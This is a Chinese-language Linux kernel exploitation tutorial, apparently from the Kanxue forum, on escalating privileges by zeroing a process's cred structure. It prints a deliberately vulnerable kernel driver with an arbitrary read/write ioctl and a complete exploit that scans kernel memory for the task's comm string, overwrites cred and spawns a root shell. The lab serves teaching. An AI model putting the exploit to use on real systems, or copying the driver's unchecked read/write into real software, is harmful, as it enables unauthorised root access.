原文地址

cred篇

• 每个线程在内核中都对应一个线程结构块thread_info
• thread_info中存在task_struct类型结构体

• struct task_struct中存在cred结构体用来保存线程权限

• 攻击流程

  • 定位某进程的cred结构体
  • 将cred结构提结构体的uid~fsgid全部覆写为0(前28字节)

<!-- more -->

一. 利用步骤

1. 定位cred结构体

• task_struct中存在char comm[TASK_COMM_LEN]

• comm字符串使用prctl函数的PR_SET_NAME自行设置

• 在内存中搜索被设置后的comm字符串，cred结构体地址就在附近

• 泄漏cred结构体地址，定向覆盖cred结构体

2. 进程权限被修改，变成root进程，执行system("/bin/sh")，弹出root shell

二. 驱动代码

#include <linux/init.h>
#include <linux/module.h>
#include <linux/cdev.h>
#include <linux/device.h>
#include <linux/fs.h>
#include <linux/uaccess.h>
#include <asm/cacheflush.h>

#define CHANGE_POINT 0x100000
#define RW_READ 0x100001
#define RW_WRITE 0x100002
#define SET_MEM 0x100003

dev_t dev_id = 0;
struct cdev cdev_0;
struct class *dev_class;

struct vunl
{
    char *point;
    size_t size;
} VUNL;

long rw_any_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
{
    int ret = 0;
    switch (cmd)
    {
    case CHANGE_POINT:
        ret = copy_from_user(&VUNL, (struct vunl *)(arg), sizeof(struct vunl));
        break;

    case RW_READ:
        ret = copy_to_user((char *)arg, (char *)VUNL.point, VUNL.size);
        break;

    case RW_WRITE:
        ret = copy_from_user((char *)VUNL.point, (char *)arg, VUNL.size);
        break;

    default:
        break;
    }

    return ret;
}

int rw_any_init(void)
{
    unsigned int base_minor = 0;
    unsigned int dev_num = 1;
    static const struct file_operations fops = {
        .unlocked_ioctl = rw_any_ioctl};
    alloc_chrdev_region(&dev_id, base_minor, dev_num, "rw_any");
    cdev_init(&cdev_0, &fops);
    cdev_add(&cdev_0, dev_id, 1);
    dev_class = class_create(THIS_MODULE, "rw_any_class");
    device_create(dev_class, 0, dev_id, NULL, "rw_any_dev");

    return 0;
}

void rw_any_exit(void)
{
    device_destroy(dev_class, dev_id);
    class_destroy(dev_class);
    cdev_del(&cdev_0);
    unregister_chrdev_region(dev_id, 1);
}

module_init(rw_any_init);
module_exit(rw_any_exit);

MODULE_LICENSE("GPL");

三. exp

#define _GNU_SOURCE

#include <stdio.h>
#include <string.h>
#include <fcntl.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>

#define CHANGE_POINT 0x100000
#define RW_READ 0x100001
#define RW_WRITE 0x100002

struct vunl
{
    char *point;
    size_t size;
} VUNL;

size_t leak_data(int fd, char *buf, char *target)
{
    char *res = 0;
    size_t cred = 0;
    size_t real_cred = 0;

    VUNL.size = 0x1000;
    for (size_t addr = 0xffff880000000000; addr < 0xffffc80000000000; addr += 0x1000)
    {
        VUNL.point = (char *)addr;

        ioctl(fd, CHANGE_POINT, &VUNL);
        ioctl(fd, RW_READ, buf);
        res = memmem(buf, 0x1000, target, 16);

        if (res)
        {
            printf("[+] the addr of comm[TASK_COMM_LEN] is: %p\n", res);
            cred = *(size_t *)(res - 0x8);
            real_cred = *(size_t *)(res - 0x10);
            if ((cred || 0xff00000000000000) && (real_cred == cred))
            {
                printf("[+] found cred 0x%lx\n", real_cred);
                break;
            }
        }
        if (res == 0)
        {
            puts("[-] not found, try again!\n");
        }
    }
    return real_cred;
}

int main()
{
    int fd = 0;
    char target[16] = "TheTargetOfComm";
    char *buf = malloc(0x1000);
    char payload[28] = {0};
    size_t cred = 0;
    prctl(PR_SET_NAME, target);
    fd = open("/dev/rw_any_dev", O_RDWR);
    VUNL.point = (char *)leak_data(fd, buf, target);
    VUNL.size = 28;
    ioctl(fd, CHANGE_POINT, &VUNL);
    ioctl(fd, RW_WRITE, payload);

    if (getuid() == 0)
    {
        printf("[+] r00t:\n");
        system("/bin/sh");
    }
    else
    {
        puts("[-] error!");
        exit(-1);
    }

    return 0;
}

看雪论坛2020激励机制：能力值、活跃值和雪币体系！会员积分、权限和会员发帖、回帖活跃程度关联！